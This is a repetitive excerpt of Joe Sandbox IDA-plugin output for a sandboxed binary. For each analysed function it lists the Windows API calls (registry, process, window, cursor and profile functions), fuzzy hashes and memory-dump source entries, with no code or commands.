                                          • Opcode Fuzzy Hash: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                                          • Instruction Fuzzy Hash: 272180756007096BD610AF69DC89FAF73A8FB88704F00841FF918A7241DAB8A9418B69
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                                          • Instruction ID: b0f148a0463f8e77612455c4d0488571574065cadd758f34d18f988e9301810f
                                          • Opcode Fuzzy Hash: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                                          • Instruction Fuzzy Hash: 2A819F74600604BFEB24CF95C994FBB7B68EF59350F10804EF8959B341E6B8AC45CB6A
                                          APIs
                                          • GetCurrentProcessId.KERNEL32(?), ref: 0047584D
                                          • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0047585B
                                          • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0047587F
                                          • CloseHandle.KERNEL32(00000000), ref: 00475A4D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: Process$CloseCountersCurrentHandleOpen
                                          • String ID:
                                          • API String ID: 3488606520-0
                                          • Opcode ID: ce4ed15879a0d4705bc9675b55154bd71a0022cbb1f9dd3a70cee976304ba055
                                          • Instruction ID: 747e8e91012d04cc7bcfbda4f2b49d0ca9967bea8b965680eccea6cdbc9dea0c
                                          • Opcode Fuzzy Hash: ce4ed15879a0d4705bc9675b55154bd71a0022cbb1f9dd3a70cee976304ba055
                                          • Instruction Fuzzy Hash: 82817170A047029FD310DF65C981B4BBBE1BF84704F10892EF6999B3D2DA75E944CB96
                                          APIs
                                            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B5B5
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: ConnectRegistry_memmove_wcslen
                                          • String ID:
                                          • API String ID: 15295421-0
                                          • Opcode ID: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                                          • Instruction ID: 481e56be03c4cee60d8ca92471cfa4b3875eab78bcfcbf7fb961631f720e0f99
                                          • Opcode Fuzzy Hash: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                                          • Instruction Fuzzy Hash: 7D515F71208301ABD304EF65C885E5BB7A8FF88704F10892EB54597291D774E945CBA6
                                          APIs
                                          • LoadLibraryW.KERNEL32(00000000,?,?,?), ref: 0046485D
                                          • GetProcAddress.KERNEL32(?,?), ref: 004648F7
                                          • GetProcAddress.KERNEL32(?,00000000), ref: 00464916
                                          • GetProcAddress.KERNEL32(?,?), ref: 0046495A
                                          • FreeLibrary.KERNEL32(?,?,?,?), ref: 0046497C
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: AddressProc$Library$FreeLoad
                                          • String ID:
                                          • API String ID: 2449869053-0
                                          • Opcode ID: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
                                          • Instruction ID: 8919579e2c9fc9b2d94c4928dd3202a5bdd7863bc063e44bf2a6fba2f1eed130
                                          • Opcode Fuzzy Hash: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
                                          • Instruction Fuzzy Hash: 2351BF756002049FCB00EFA4C985A9EB7B4EF88304F14856EFD05AB392DB79ED45CB99
                                          APIs
                                          • GetCursorPos.USER32(?), ref: 004563A6
                                          • ScreenToClient.USER32(?,?), ref: 004563C3
                                          • GetAsyncKeyState.USER32(?), ref: 00456400
                                          • GetAsyncKeyState.USER32(?), ref: 00456410
                                          • GetWindowLongW.USER32(?,000000F0), ref: 00456466
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: AsyncState$ClientCursorLongScreenWindow
                                          • String ID:
                                          • API String ID: 3539004672-0
                                          • Opcode ID: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                                          • Instruction ID: 60090bce41a6de58f2ab96a8453d1e3558661e38fd0c916b19f374a884add038
                                          • Opcode Fuzzy Hash: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                                          • Instruction Fuzzy Hash: 49414C74504204BBDB24CF65C884EEFBBB8EB46326F60464EFC6593281CB34A944CB68
                                          APIs
                                          • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D438
                                          • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D44D
                                          • Sleep.KERNEL32(0000000A), ref: 0047D455
                                          • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D460
                                          • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D56A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: Interlocked$DecrementIncrement$Sleep
                                          • String ID:
                                          • API String ID: 327565842-0
                                          • Opcode ID: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                                          • Instruction ID: e00c67d4cb89bf1d5311357fb713975cbca1e0cfcee7190b0451066ade77f289
                                          • Opcode Fuzzy Hash: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                                          • Instruction Fuzzy Hash: CC412571A002055FEB10DF65CD84AEE7774EF45304B10852EF609A7351E738EE46CB99
                                          APIs
                                          • GetPrivateProfileSectionW.KERNEL32(00000000,?,?,00007FFF), ref: 0045C44F
                                          • GetPrivateProfileSectionW.KERNEL32(00000000,00000003,?,00000003), ref: 0045C477
                                          • WritePrivateProfileSectionW.KERNEL32(00000000,00000003,?), ref: 0045C4C3
                                          • WritePrivateProfileStringW.KERNEL32(00000000,?,00000000,00000000), ref: 0045C4E7
                                          • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0045C4F6
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: PrivateProfile$SectionWrite$String
                                          • String ID:
                                          • API String ID: 2832842796-0
                                          • Opcode ID: a5613791a7b7745f301c2db32c82459f4eb77f00fff265897707edd8741bbf57
                                          • Instruction ID: 1eb5009190fa999c36a74edd43b7bd9b51adbc8f8691a9c3f5840d50e9073e8b
                                          • Opcode Fuzzy Hash: a5613791a7b7745f301c2db32c82459f4eb77f00fff265897707edd8741bbf57
                                          • Instruction Fuzzy Hash: D1413075A00209BFDB10EFA1DC85FAAB7A8BF44305F10855EF9049B292DA79EE44CB54
                                          APIs
                                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00441CA9
                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00441CDD
                                          • RegCloseKey.ADVAPI32(?), ref: 00441CFE
                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 00441D40
                                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00441D6E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: Enum$CloseDeleteOpen
                                          • String ID:
                                          • API String ID: 2095303065-0
                                          • Opcode ID: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                                          • Instruction ID: 7ca4c7ada97503ad9332fce322fe5d5fc03c2789ff93db080e75f28165cdf273
                                          • Opcode Fuzzy Hash: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                                          • Instruction Fuzzy Hash: 69317CB2940108BAEB10DBD4DC85FFEB77CEB49304F04456EF605A7241D774AA858BA8
                                          APIs
                                          • GetWindowRect.USER32(?,?), ref: 00436A24
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: RectWindow
                                          • String ID:
                                          • API String ID: 861336768-0
                                          • Opcode ID: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                                          • Instruction ID: 0a42da3bb0701689e96ef39581243ed39d97d4ba46bd7cd8c1f057aae640e0d3
                                          • Opcode Fuzzy Hash: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                                          • Instruction Fuzzy Hash: E531EA7160021EAFDB00DF68D988AAE77A5EB49324F11C62AFD24E7380D774EC11CB90
                                          APIs
                                          • SendMessageW.USER32 ref: 00449598
                                            • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                                          • SendMessageW.USER32(?,00001074,?,?), ref: 004495F8
                                          • _wcslen.LIBCMT ref: 0044960D
                                          • _wcslen.LIBCMT ref: 0044961A
                                          • SendMessageW.USER32(?,00001074,?,?), ref: 0044964E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: MessageSend$_wcslen$_wcspbrk
                                          • String ID:
                                          • API String ID: 1856069659-0
                                          • Opcode ID: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
                                          • Instruction ID: 683be220b4a5e9d86ccbf412c3bd2f13dbb60120779f28b1c577ab6eeef24407
                                          • Opcode Fuzzy Hash: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
                                          • Instruction Fuzzy Hash: 77318F71A00218ABEB20DF59DC80BDFB374FF94314F10466AFA0497280E7B59D958B94
                                          APIs
                                          • GetCursorPos.USER32(?), ref: 004478E2
                                          • TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 004478FC
                                          • DefDlgProcW.USER32(?,0000007B,?,?), ref: 0044791D
                                          • GetCursorPos.USER32(00000000), ref: 0044796A
                                          • TrackPopupMenuEx.USER32(009D63C0,00000000,00000000,?,?,00000000), ref: 00447991
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: CursorMenuPopupTrack$Proc
                                          • String ID:
                                          • API String ID: 1300944170-0
                                          • Opcode ID: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                                          • Instruction ID: 8079d3ea29232e2d8a780d7c6517a0c600664366e77620ab1eef72d1e193e80f
                                          • Opcode Fuzzy Hash: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                                          • Instruction Fuzzy Hash: EF31CF75600108AFE724CF59DC88FABB768EB89310F20455AF94587391C775AC53CBA8
                                          APIs
                                          • GetClientRect.USER32(?,?), ref: 004479CC
                                          • GetCursorPos.USER32(?), ref: 004479D7
                                          • ScreenToClient.USER32(?,?), ref: 004479F3
                                          • WindowFromPoint.USER32(?,?), ref: 00447A34
                                          • DefDlgProcW.USER32(?,00000020,?,?), ref: 00447AAD
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: Client$CursorFromPointProcRectScreenWindow
                                          • String ID:
                                          • API String ID: 1822080540-0
                                          • Opcode ID: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                                          • Instruction ID: a7e7621e8492875af53c289f1ad187460d50aec5ad556b3834d9a5cb4abdf121
                                          • Opcode Fuzzy Hash: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                                          • Instruction Fuzzy Hash: B831A2741082029FE710DF69D884D7FB7A4FB89314F144A1EF850D7291D774E946CBA6
                                          APIs
                                          • GetWindowRect.USER32(?,?), ref: 00447C5D
                                          • ScreenToClient.USER32(?,?), ref: 00447C7B
                                          • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                                          • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                                          • EndPaint.USER32(?,?), ref: 00447D13
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: ClientPaintRectRectangleScreenViewportWindow
                                          • String ID:
                                          • API String ID: 659298297-0
                                          • Opcode ID: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                                          • Instruction ID: 3c0582d8bc81ba5dadaaf244cb1f1d3939805113443e317e1f98b5bdeebaec33
                                          • Opcode Fuzzy Hash: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                                          • Instruction Fuzzy Hash: C33161706043019FE310CF25D8C8F7B7BE8EB86724F144A6EF9A5872A1C774A845DB69
                                          APIs
                                          • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                          • EnableWindow.USER32(?,00000001), ref: 00448B72
                                          • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                          • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                          • EnableWindow.USER32(?,00000001), ref: 00448C09
                                            • Part of subcall function 00440D98: SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00440DB8
                                            • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440DFA
                                            • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440E3A
                                            • Part of subcall function 00440D98: SendMessageW.USER32(009D1A00,000000F1,00000000,00000000), ref: 00440E6E
                                            • Part of subcall function 00440D98: SendMessageW.USER32(009D1A00,000000F1,00000001,00000000), ref: 00440E9A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: Window$EnableMessageSend$LongShow
                                          • String ID:
                                          • API String ID: 142311417-0
                                          • Opcode ID: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                                          • Instruction ID: c941ec4e4e3d0536419715940b2668e48b64c275bb9f23e9dd6fd7b29375311a
                                          • Opcode Fuzzy Hash: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                                          • Instruction Fuzzy Hash: DE21F7B17443805BF7258E24CCC4BAFB7D0EF56345F08482EF98196391DBACA885C75A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                                          • Instruction ID: af34b986bc09d21a6a739d25b45c5a22770885c200d938a8bd6fc5fff5094107
                                          • Opcode Fuzzy Hash: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                                          • Instruction Fuzzy Hash: 5921AE75200600DBC710EF29E9D496B77B9EF49362B00466EFE5197392DB34EC09CB69
                                          APIs
                                          • IsWindowVisible.USER32(?), ref: 00445879
                                          • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00445893
                                          • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 004458CD
                                          • _wcslen.LIBCMT ref: 004458FB
                                          • CharUpperBuffW.USER32(00000000,00000000), ref: 00445905
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
